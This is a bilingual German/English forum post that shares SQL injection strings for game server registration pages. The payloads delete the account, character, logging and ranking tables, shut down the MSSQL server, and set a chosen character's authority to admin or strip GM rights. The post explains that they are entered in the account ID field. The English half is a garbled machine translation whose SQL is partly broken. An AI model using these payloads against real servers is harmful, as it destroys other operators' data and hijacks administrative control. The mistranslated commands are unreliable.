Heyho,
Deutsch:
ich hab für euch mal ein paar SQL Injection Befehle rausgesucht:
Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!
Werde diesen Thread updaten, wenn neue bekannt sind!
English:
The whole thing was written by fruit to score. So credits to him!
Will update this thread when new ones are announced!
Edit1: English Translation added!
Greez,
Fullscreen
Deutsch:
ich hab für euch mal ein paar SQL Injection Befehle rausgesucht:
Das ganze funktioniert nur, wenn die Serverbetreiber Sonderzeichen zulassen!Quote:
Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!
Löscht die AccountdatenbankQuote:
';delete account_tbl;--
Löscht die CharacterdatenbankQuote:
';delete character_01_tbl;--
Löscht die LoggdatenbankQuote:
';delete logging_01_tbl;--
Löscht die RankingdatenbankQuote:
';delete ranking_tbl;--
Schließt die MSSQL Verbindung!Quote:
';shutdown;--
Gibt deinen Charackter Adminrechte!Quote:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'
Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!
Wie das funktioniert?
Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!
Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!
Werde diesen Thread updaten, wenn neue bekannt sind!
English:
It works only if the Allow server operators, special symbolsQuote:
Today I present a list of SQL injections!
Deletes the account databaseQuote:
'; delete account_tbl ;--
Deletes the character databaseQuote:
'; delete character_01_tbl, -
Clears the log databaseQuote:
'; delete logging_01_tbl, -
Deletes the ranking databaseQuote:
'; delete ranking_tbl, -
Closes the MSSQL connection!Quote:
'; shutdown ;--
Makes your character to the admin!Quote:
USE [CHARACTER_01_DBF]
UPDATE SET CHARACTER_TBL m_chAuthority = 'Z'
WHERE m_szName = 'ACCOUNTID' and index server = '01 '
USE [ACCOUNT_DBF]
UPDATE SET ACCOUNT_TBL_DETAIL m_chLoginAuthority = 'Z'
WHERE account = 'CHARACTER NAME' and game code = 'A000'
So you can also withdraw an admin or other GM Ingamerrechten with the right man only needs to know only the AccountID and Characktername and make the 'Z' a 'F'!
How does it work?
Simply enter the code in the Page tab type where normally your accountid comes in!
The whole thing was written by fruit to score. So credits to him!
Will update this thread when new ones are announced!
Edit1: English Translation added!
Greez,
Fullscreen